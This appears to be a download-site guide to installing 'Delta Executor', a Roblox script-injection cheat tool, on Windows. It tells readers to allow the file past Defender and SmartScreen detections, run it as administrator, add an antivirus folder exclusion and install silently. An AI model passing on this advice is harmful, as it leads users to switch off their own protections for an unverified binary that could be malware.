Keyless on PC

How to Install Delta Executor on PC

Install Delta on Windows 10 or 11 in under two minutes — no key, no verification, no account. Includes the Defender false-positive fix and the admin-run step the official guide skips.

The Delta PC build is the cleanest of the four. It is 100% keyless — no daily verification, no redirects, no offers — because the PC clients carry lower abuse risk than phones. The whole install takes about 90 seconds on a clean Windows 10 or 11 laptop, with three caveats: handle the Defender false positive correctly, run the installer as administrator, and let Delta add its own folder exclusion so the runtime engine is not killed mid-session.

System Requirements

  • OS: Windows 10 (1909 build or newer) or Windows 11. 64-bit only.
  • CPU: Intel Core i3 / AMD Ryzen 3 or newer. ARM64 is in beta — join the Discord for early access.
  • RAM: 4 GB minimum, 8 GB recommended for Blox Fruits and Pet Simulator X auto-farm.
  • Disk: ~250 MB free.
  • Runtime: .NET Framework 4.8 (auto-installs if missing).
  • Roblox: latest version from the Microsoft Store or roblox.com.

Step 1 — Download the Installer

On your PC, browse to deltaxecutor.download/download, scroll to Delta for Windows, and click the gold download button. Save the file delta-x-v2.738-setup.exe to your Downloads folder. The file is roughly 84 MB and the SHA-256 is published on the download page — you can compare it locally with certutil -hashfile delta-x-v2.738-setup.exe SHA256 in PowerShell.

Avoid mirrors. The only legitimate download URL is the one on this domain.

Step 2 — Handle the Windows Defender False Positive

Delta injects Lua scripts into the live Roblox process — the exact behavior that SmartScreen and Defender treat as suspicious. The first time you run the installer, Defender will flag it. The right path through that warning matters. The wrong path (permanently disabling Defender) leaves you exposed.

  1. After the .exe downloads, click the Shield icon in the notification area (or open Windows Security → Virus & threat protection).
  2. Scroll to Protection history. Find the entry for delta-x-v2.738-setup.exe.
  3. Click the entry, scroll down to Actions, and choose Allow on device.
  4. Return to your Downloads folder and double-click the .exe. Defender should now let it run.

If SmartScreen itself shows a blue "Windows protected your PC" banner, click More info, then Run anyway. Both paths are safe for the verified Delta installer on this domain.

Step 3 — Run the Installer as Administrator

Right-click delta-x-v2.738-setup.exe → Run as administrator. The Delta installer needs elevated permissions so it can register the Lua runtime as a Windows service. The install wizard is short:

  1. Accept the license agreement.
  2. Pick the install location (default is fine).
  3. Tick Create desktop shortcut.
  4. Click Install.

The whole install takes about 25 seconds and finishes with a desktop shortcut and a Start Menu entry.

Step 4 — Let Delta Add Its Own Defender Exclusion

The installer automatically registers its install folder with Windows Defender as an allowed path. This is necessary because Defender scans injected scripts in real time and may flag the Lua runtime engine. If you ever re-install Windows or move the install folder manually, repeat this step:

  1. Open Windows Security → Virus & threat protection → Threat protection settings → Exclusions.
  2. Click Add or remove exclusions → Add an exclusion → Folder.
  3. Browse to C:\Program Files\DeltaExecutor\ (or wherever you installed) and confirm.

Step 5 — Launch & Attach to Roblox

Open Delta from the desktop shortcut. On first launch, Delta walks you through a 30-second orientation: choose your theme, sign into your Delta cloud account (optional), and pick a default Script Hub category. Skip everything if you would rather explore from scratch.

  1. Open Roblox and join any game.
  2. Delta detects the running Roblox client and attaches automatically — you will see the floating Delta icon in the top-left of the screen.
  3. Click the floating icon to open the Delta overlay.
  4. Pick a script from the Script Hub (or paste a loadstring from the blog).
  5. Click Execute.

Uninstalling Delta

Delta installs cleanly and removes cleanly. Open Settings → Apps → Installed apps, find Delta Executor in the list, click the ⋮ → Uninstall. The Defender folder exclusion is removed automatically. Nothing is left behind in your registry or your user profile.

Troubleshooting

"Delta installs but the floating icon never shows up." Open Roblox, join any game, wait 5–10 seconds, then Alt-Tab back to Roblox. Delta attaches after Roblox transitions from the loading screen to the in-game UI.

"Defender keeps deleting the .exe." That means Step 2 did not register correctly. Repeat the Allow on device flow, then re-download the installer.

"Delta says 'Roblox client not found'." Run Delta as administrator (right-click → Run as administrator). On rare systems where Roblox lives in the Microsoft Store sandbox, switch to the roblox.com install path.

"Script runs but the GUI never appears." Some scripts gate the GUI behind a 10-second delay so they can wire up hooks first. Wait, don't click anything, and it appears.

Silent Install (For Power Users)

Delta supports a fully silent install path that drops the binary without showing the wizard. Useful if you are deploying to multiple PCs, scripting fleet setups, or just want the cleanest possible install trace:

  1. Open a Command Prompt or PowerShell window as Administrator.
  2. Run delta-x-v2.738-setup.exe /S /D=C:\Delta.
  3. The installer runs silently, drops the binary in C:\Delta, and exits with code 0.
  4. Launch Delta from the new location, complete the optional account sign-in, and attach to Roblox.

The /S flag is the silent toggle. /D overrides the default install path (default is C:\Program Files\DeltaExecutor\). The installer registers the same Defender folder exclusion during a silent install, so subsequent launches are not blocked.

Running Delta on Multiple PCs

If you have a gaming PC, a work laptop, and a media PC, you probably want Delta on all three with the same script library. The cleanest path is the Delta cloud sync: install Delta on each device, sign in with the same Delta account, and your saved scripts follow you wherever you log in. Cloud sync is end-to-end encrypted with a key only your devices hold, so even Delta's staff cannot read your scripts in transit.

The free tier of cloud sync includes unlimited script saves. The paid Delta Cloud tier (USD 1.99/month) adds version history, priority support, and a 90-day cloud retention window. Most users do not need the paid tier — the free tier is the same Delta the team uses themselves.

Windows on ARM (Coming Soon)

The Delta PC build runs on Windows-on-ARM through Microsoft's x64 emulator today, but a native ARM64 binary has been in beta for most of 2026 and is expected to ship as the default Windows ARM build in Q4. The native ARM build cuts CPU usage by roughly half on Snapdragon X Elite and X Plus laptops, and dramatically improves battery life during long auto-farm runs.

If you are on Windows-on-ARM and want early access, open a ticket through the support system on the contact page — the team will route you to the beta channel.

What's Next

Delta is now installed and running on your PC, and your first script has executed inside Roblox. From here, the natural next step is to save a starter script to your cloud account, browse the Blox Fruits guide or the Grow a Garden guide, and pick a loadstring to save. The Key System Explained post is the right read if you want to understand why PC is keyless but mobile is not.
